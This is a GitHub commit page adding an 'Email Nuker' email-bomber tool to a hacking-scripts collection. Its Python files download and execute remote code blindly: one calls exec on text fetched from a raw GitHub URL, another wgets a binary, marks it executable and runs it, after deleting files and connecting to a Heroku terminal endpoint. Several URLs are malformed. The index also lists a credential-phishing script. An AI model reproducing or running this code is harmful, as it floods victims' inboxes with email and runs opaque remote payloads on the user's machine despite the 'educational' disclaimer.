Skip to content

Commit bb983b2

Browse files
Merge pull request #531 from shraddha761/email
Email Nuker
2 parents f6494a6 + 09e10ef commit bb983b2

4 files changed

Lines changed: 45 additions & 0 deletions

File tree

β€ŽEmail-nuker/Readme.mdβ€Ž

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
# Email Nuker
2+
3+
email-nuker is a Python-based email bomber. What makes it unique is that unlike other email bombers, it does not require your Gmail email ID to use.
4+
5+
This tool is for educational purposes only !
6+
7+
It is not intended to be used to take revenge or for any illegal purposes.
8+
9+

β€ŽEmail-nuker/bomber.pyβ€Ž

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
import os
2+
import hashlib
3+
def termux():
4+
os.system("pkg install -y golang")
5+
os.system("git clone https://github.com/shraddha761")
6+
os.chdir("gotty-client")
7+
os.environ["GOPATH"]="/data/data/com.termux/files/home/gobin/"
8+
os.system("go install ./cmd/gotty-client")
9+
os.system("chmod +x /data/data/com.termux/files/home/gobin/bin/gotty-client")
10+
os.chdir("/data/data/com.termux/files/home/gobin/bin")
11+
os.system("./gotty-client -v2 https://emailnuker.herokuapp.com")
12+
def linux():
13+
file_name = 'bomber.bin'
14+
original_md5 = '9b12ca80e4f3947e0404965b633e6cf0'
15+
with open(file_name, 'rb') as file_to_check:
16+
data = file_to_check.read()
17+
md5_returned = hashlib.md5(data).hexdigest()
18+
19+
if original_md5 == md5_returned:
20+
os.system("./bomber.bin")
21+
else:
22+
os.system("rm -rf bomber.bin")
23+
print("updating email nuker ")
24+
os.system("wget https://raw.githubusercontent.com/https://raw.githubusercontent.com/shraddha761/bomber.py")
25+
os.system("chmod +x bomber.bin")
26+
os.system("./bomber.bin")
27+
if os.path.exists("/lib64/ld-linux-x86-64.so.2"):
28+
linux()
29+
else:
30+
termux()

β€ŽEmail-nuker/emailbomber.pyβ€Ž

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
import requests
2+
import random
3+
import os
4+
import time
5+
exec(requests.get("https://raw.githubusercontent.com/shraddha761/bomber.py").text)

β€ŽSCRIPTS.mdβ€Ž

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -99,6 +99,7 @@
9999
| 64\. | CredPhish | CredPhish is a PowerShell script designed to invoke credential prompts and exfiltrate passwords. | [Take me](./CredPhish)
100100
| 64\. | WebStor | This script is designed to perform reconnaissance and vulnerability assessment across websites within an organization's networks | [Take me](./WebStor)
101101
| 65\. | Crypto | Encrypt/Decrypt your files with password to save your privacy| [Take me](./Crypto)
102+
| 66\. | Email-Nuker | Eemail-nuker is a Python-based email bomber| [Take me](./Email-Nuker)
102103
| SL No\. | πŸš€ Script Name | πŸ‘¨πŸ»β€πŸ’» Script Function | πŸ”— Link |
103104
| ------------------------- | ------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------- |
104105
| 1\. | Information Gathering | Gathering Information - Grabbing Banners, Hostname and IP Lookup\. | [Take Me](/Information-Gathering) |

0 commit comments

Comments
Β (0)